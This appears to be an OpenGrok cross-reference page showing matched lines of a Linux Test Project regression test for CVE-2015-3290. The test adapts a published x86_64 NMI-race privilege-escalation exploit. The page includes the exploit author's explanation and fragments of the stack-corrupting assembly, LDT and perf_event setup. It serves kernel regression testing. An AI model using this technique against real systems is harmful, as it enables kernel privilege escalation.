cve-2015-3290.c - OpenGrok cross reference for /third_party/ltp/testcases/cve/cve-2015-3290.c

Lines Matching +full:linux +full:- +full:no +full:- +full:asm
1 // SPDX-License-Identifier: GPL-2.0-or-later
4  * Copyright (c) 2018-2022 Linux Test Project
12 http://www.openwall.com/lists/oss-security/2015/08/04/8
14 > +++++ CVE-2015-3290 +++++
19 > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c…
21 > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
23 > You can mitigate CVE-2015-3290 by blocking modify_ldt or
24 > perf_event_open using seccomp.  A fully-functional, portable, reliable
32 reliable privilege escalation on any Linux x86_64 system in which
36 Glossing over a lot of details, the basic structure of Linux' nested NMI
55 Alas, on x86_64, there is no reasonable way to block NMIs to run the
60 restore register state correctly [1] when returning to a 16-bit stack
62 espfix64 is invoked on return, a well-behaved IRET is emulated by a
68 observably non-atomic.
73 gets ignored.  There is a two-instruction window in which the return
74 context ends up with user-controlled RIP and CS set to __KERNEL_CS.
78 during the two-instruction window.  This exploit appears to work
79 reasonably quickly across a fairly wide range of Linux versions.
92   - This exploit's payload just prints the text "CPL0".  The exploit
99   - If you are using a kernel older than v4.1, a 64-bit build of the
102     as a 32-bit binary or (so I'm told) as an x32 binary.
104   - This is the first exploit I've ever written that contains genuine
105     hexadecimal code.  The more assembly-minded among you can have
114 --Andy
126 #include <asm/ldt.h>
133 #include <linux/perf_event.h>
138 /* Abstractions for some 32-bit vs 64-bit differences. */
151 	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];  in ssptr()
152 	return &sels->ss;  in ssptr()
158 	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];  in csptr()
159 	return &sels->cs;  in csptr()
170 	return &ctx->uc_mcontext.gregs[REG_SS];  in ssptr()
176 	return &ctx->uc_mcontext.gregs[REG_CS];  in csptr()
185 	/* Boring 16-bit data segment. */  in set_ldt()
191 		.contents	= 0, /* Data, expand-up */  in set_ldt()
200 	if (TST_RET == -EINVAL) {  in set_ldt()
202 			"modify_ldt: 16-bit data segments are probably disabled");  in set_ldt()
211 	asm volatile (  in try_corrupt_stack()
256 	asm volatile (  in try_corrupt_stack()
362 		fd = perf_event_open(&pe, 0, -1, -1, 0);  in child_thread()
363 		if (fd == -1) {  in child_thread()
367 					"no hardware counters");  in child_thread()
378 	asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));  in child_thread()
385 		 * If we ended up with IF == 0, there's no easy way to fix  in child_thread()
435 	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)  in setup()
471 		{"linux-git", "9b6e6a8334d5"},
472 		{"CVE", "2015-3290"},